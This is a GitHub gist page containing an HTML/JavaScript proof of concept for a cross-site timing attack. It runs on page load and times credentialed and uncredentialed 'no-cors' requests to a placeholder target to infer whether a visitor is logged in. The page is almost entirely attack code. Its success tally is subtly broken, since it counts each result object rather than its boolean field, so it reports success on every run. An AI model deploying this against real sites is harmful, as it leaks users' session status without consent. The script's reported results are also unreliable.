Skip to content

Instantly share code, notes, and snippets.

@ziir
Created December 19, 2022 22:17
Show Gist options
  • Save ziir/98b79638b4cb889c1b718e56eab0f68a to your computer and use it in GitHub Desktop.
Save ziir/98b79638b4cb889c1b718e56eab0f68a to your computer and use it in GitHub Desktop.
<html>
<body>
<script>
const TARGET_URL = "https://target.example.com";
const TIME_DIFF_TOLERANCE_RATIO = 0.4;
const SUCCESS_CONFIDENCE_RATIO = 0.8;
function sendCrossOriginRequest(includeCredentials = false) {
const start = Date.now();
return fetch(TARGET_URL, {
method: "GET",
mode: "no-cors",
credentials: includeCredentials ? "include" : "omit",
})
.catch(() => {})
.then(() => {
const end = Date.now();
const total = end - start;
console.debug(`Received opaque response in ${total}ms`, {
includeCredentials,
});
return total;
});
}
async function attack() {
console.debug("Sending request without credentials ...");
const withoutCredentials = await sendCrossOriginRequest(false);
console.debug("Sending request with credentials ...");
const withCredentials = await sendCrossOriginRequest(true);
const absolute = Math.abs(
Math.min(withoutCredentials, withCredentials) -
Math.max(withoutCredentials, withCredentials)
);
const threshold =
TIME_DIFF_TOLERANCE_RATIO *
Math.min(withoutCredentials, withCredentials);
const result = absolute > threshold;
console.debug({ absolute, threshold, result });
return { absolute, threshold, result };
}
async function run(iterations = 1) {
const results = Array(iterations);
let i = 0;
while (iterations--) {
console.debug("Executing attack ...", i);
results[i] = await attack();
console.log("Executed attack!", results[i]);
i++;
}
const [success, failure] = results.reduce(
([success, failure], result) => {
if (result) success++;
if (!result) failure++;
return [success, failure];
},
[0, 0]
);
console.log("Results:", { success, failure });
if (success >= Math.ceil(results.length * SUCCESS_CONFIDENCE_RATIO)) {
console.log(
"Notable time difference detected, attack has succeeded!"
);
} else {
console.log(
"No notable time difference detected, attack has failed!"
);
}
}
// execute the attack 10 times
run(10);
</script>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment